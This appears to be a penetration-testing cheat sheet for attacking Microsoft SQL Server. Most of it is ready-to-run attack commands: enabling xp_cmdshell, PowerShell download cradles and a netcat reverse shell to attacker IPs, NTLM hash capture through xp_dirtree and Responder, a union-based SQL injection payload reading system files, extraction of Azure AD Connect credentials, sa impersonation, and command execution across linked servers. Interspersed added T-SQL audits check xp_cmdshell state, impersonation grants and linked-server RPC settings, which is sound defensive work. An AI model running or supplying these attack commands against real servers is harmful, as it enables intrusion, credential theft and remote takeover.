MSSQL
Login to MSSQL Server with SQSH
sqsh -S $IP -U sa -P <password>
> EXEC SP_CONFIGURE 'show advanced options',1;reconfigure
> EXEC SP_CONFIGURE 'xp_cmdshell',1;reconfigure
> xp_cmdshell "whoami"
> go
Reverse Shell with Powershell
> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"
> go
PowerShell: using a Nishang payload
On the compromised host:
powershell -exec bypass
# import the module
. .\GetUserSPN.ps1
Collect from the output:
SAMAccountName
Service Principal Name
MSSQL Auth
Builtin\Users
sa (service account)
Do you have valid creds?
mssqlclient.py manager/operator:operator@manager.htb -windows-auth
# mssqlclient.py <domain>/<user>:<pass>@<target fqdn> -windows-auth
Enumeration for PrivEsc
Do you have access to the machine with mssql?
sqlcmd -Q "select * from sys.databases"
sqlcmd -Q "select name,create_date from sys.databases"
Using PowerUpSQL
# download and import
PS> IEX(New-Object Net.WebClient).downloadString("http://<attacker ip>:<port>/PowerUpSQL.ps1")
Invoke-SQLAudit -Verbose
Capturing the NTLM Hash
Make sure you can run xp_dirtree from sqlcmd.
# setup responder
sudo responder -I tun0
# make the SQL Server service account connect to the attacker's UNC path from inside sqlcmd
sqlcmd -Q "xp_dirtree '\\<attacker ip>\test'"
MSSQL Read File
Permissions: the BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
RCE with MSSQL
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe /c dir c:\';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
EXEC xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"
# reverse shell via a hosted script
# contents of power.ps1 (served from the attacker's web server):
iwr http://10.10.16.2/nc.exe -outfile c:\windows\tasks\nc.exe;
c:\windows\tasks\nc.exe -e powershell.exe 10.10.16.2 12345
# run from the SQL side:
EXECUTE AS LOGIN = 'sa';
EXEC xp_cmdshell "powershell -ep bypass iex(iwr http://10.10.16.2/power.ps1 -UseBasicParsing)";
# listener on the attacker side: rlwrap nc -lvnp 12345
If you need to reactivate xp_cmdshell (disabled by default since SQL Server 2005):
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
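The enable sequence above is the attacker's side; the defender's side is knowing whether it has already been run, who could run it, and how to undo it. The following T-SQL is an added check (not from the original page or from PayloadsAllTheThings) that reports the live state of xp_cmdshell, the logins able to change it, and the holders of the ADMINISTER BULK OPERATIONS permission mentioned in the MSSQL Read File section, then turns the option back off. It assumes a login with sysadmin (or at least VIEW ANY DEFINITION) so the catalog views are complete.

```sql
-- Added defender-side check: state of xp_cmdshell, who can flip it, who can
-- use OPENROWSET(BULK ...), and the disable sequence.

-- 1. Current state of the two options the enable sequence touches.
--    value_in_use = 1 means xp_cmdshell is live right now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Logins that can change those options: sp_configure and RECONFIGURE need
--    ALTER SETTINGS, which the sysadmin and serveradmin roles hold implicitly.
SELECT sp.name, sp.type_desc, 'role member' AS via
FROM sys.server_role_members rm
JOIN sys.server_principals r  ON rm.role_principal_id   = r.principal_id
JOIN sys.server_principals sp ON rm.member_principal_id = sp.principal_id
WHERE r.name IN ('sysadmin', 'serveradmin')
UNION ALL
SELECT sp.name, sp.type_desc, 'explicit grant'
FROM sys.server_permissions pe
JOIN sys.server_principals sp ON pe.grantee_principal_id = sp.principal_id
WHERE pe.permission_name IN ('ALTER SETTINGS', 'CONTROL SERVER')
  AND pe.state IN ('G', 'W');   -- GRANT or GRANT WITH GRANT OPTION

-- 3. Logins allowed to read files through OPENROWSET(BULK ...).
SELECT sp.name, pe.permission_name, pe.state_desc
FROM sys.server_permissions pe
JOIN sys.server_principals sp ON pe.grantee_principal_id = sp.principal_id
WHERE pe.permission_name = 'ADMINISTER BULK OPERATIONS';

-- 4. Turn xp_cmdshell back off and hide advanced options again once the
--    engagement (or the incident) is over.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

A value_in_use of 1 for xp_cmdshell on a server that has no documented reason for it is worth an incident ticket on its own; section 2 tells you which accounts could have set it.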
Is Azure AD Connect installed (ADSync database, sync account with DCSync rights)?
ref: https://blog.xpnsec.com/azuread-connect-for-redteam/
sqlcmd -Q "Use ADSync; select private_configuration_xml,encrypted_configuration FROM mms_management_agent"
# save the decryption script from the reference above as decrypt.ps1 and change its Data Source to the target's ADSync instance
IEX(New-Object Net.WebClient).downloadString('http://<attacker ip>:<port>/decrypt.ps1')
Check Ability to Impersonate User
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'show advanced options',1; reconfigure;
EXEC sp_configure 'xp_cmdshell', 1; reconfigure;
EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe -e cmd 10.10.x.y 443"'
impersonate dbo (db owner)
use msdb; EXECUTE AS USER = 'dbo';
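The IMPERSONATE query above lists only the grantor side of the permission. As an added audit (not part of the original page), the following T-SQL joins in the grantee as well, so it shows who may impersonate whom at both the server (login) and the database (user) level, and finishes with the two identity functions a detection should compare. It assumes a login that can read the catalog views (sysadmin or VIEW ANY DEFINITION); the database-level query is run inside each database of interest.

```sql
-- Added audit query: every impersonation grant, with grantee and target.

-- Server level: IMPERSONATE ON LOGIN::<target>.
-- class 101 = server principal; major_id = principal_id of the impersonated login.
SELECT grantee.name AS can_impersonate, target.name AS as_login, pe.state_desc
FROM sys.server_permissions pe
JOIN sys.server_principals grantee ON pe.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON pe.major_id = target.principal_id
WHERE pe.class = 101 AND pe.permission_name = 'IMPERSONATE';

-- Database level: IMPERSONATE ON USER::<target> (the "impersonate dbo" case above).
-- class 4 = database principal; run this in each database, e.g. msdb.
SELECT DB_NAME() AS db, grantee.name AS can_impersonate, target.name AS as_user, pe.state_desc
FROM sys.database_permissions pe
JOIN sys.database_principals grantee ON pe.grantee_principal_id = grantee.principal_id
JOIN sys.database_principals target  ON pe.major_id = target.principal_id
WHERE pe.class = 4 AND pe.permission_name = 'IMPERSONATE';

-- Why it matters for detection: after EXECUTE AS, SUSER_NAME() reports the
-- impersonated identity while ORIGINAL_LOGIN() still returns the real caller.
-- Audit records and alerts should therefore key on ORIGINAL_LOGIN(); a row where
-- the two differ is an impersonation in progress.
SELECT SUSER_NAME() AS effective_login, ORIGINAL_LOGIN() AS real_login;
REVERT;   -- drop back to the caller's own context if EXECUTE AS was used
```

Any grant that lets a low-privilege login impersonate sa or a sysadmin login is a full server compromise path and should be revoked with REVOKE IMPERSONATE ON LOGIN::<target> FROM <grantee>.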
Check Linked Server with MSSQL
EXEC sp_linkedservers;
# if linked to a DC you can query across from the current SQL server
SELECT version FROM OPENQUERY("DC01", 'SELECT @@VERSION AS version');
SELECT myuser FROM OPENQUERY("DC01", 'SELECT SYSTEM_USER AS myuser');
# execute the RCE at dc01
EXEC ('sp_configure ''show advanced options'',1; reconfigure;') AT dc01
EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT dc01
EXEC ('xp_cmdshell ''powershell -enc <base64 powershell>'' ') AT dc01
Nested quoting gets messy in MSSQL queries, so passing the command base64-encoded (powershell -enc) is the best option.
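The EXEC ... AT chain above only works when the link has RPC Out enabled and its login mapping hands the caller a privileged identity on the remote side. The following T-SQL is an added inventory query (not from the original page) that lists every linked server with those two properties and its credential mapping, followed by the option change that closes the EXEC ... AT path on a link that only needs OPENQUERY. It assumes sysadmin on the local server; the server name DC01 is the one used in the examples above.

```sql
-- Added audit query: linked servers, RPC Out / data access flags and the
-- login mapping each one uses.
SELECT s.name                         AS linked_server,
       s.product, s.provider, s.data_source,
       s.is_rpc_out_enabled,          -- 1: EXEC (...) AT <server> is allowed
       s.is_data_access_enabled,      -- 1: OPENQUERY against it is allowed
       COALESCE(lp.name, '<all logins>') AS local_login,  -- 0/NULL = default mapping
       ll.uses_self_credential,       -- 1: caller's own identity is passed through
       ll.remote_name                 -- fixed remote account when not self-mapped
FROM sys.servers s
LEFT JOIN sys.linked_logins    ll ON ll.server_id    = s.server_id
LEFT JOIN sys.server_principals lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Worst case in the output: is_rpc_out_enabled = 1 together with a default
-- mapping (local_login = '<all logins>') whose remote_name is 'sa' or another
-- sysadmin login. Every local login can then run xp_cmdshell on the remote box.

-- Hardening for a link that only needs OPENQUERY: switch RPC Out off so
-- EXEC ... AT can no longer push sp_configure / xp_cmdshell to the remote side.
EXEC sp_serveroption @server = 'DC01', @optname = 'rpc out', @optvalue = 'false';
```

Re-run the inventory after the change and confirm is_rpc_out_enabled reads 0 for DC01; the OPENQUERY reads in the section above keep working, the EXEC ... AT statements fail.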
reference:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md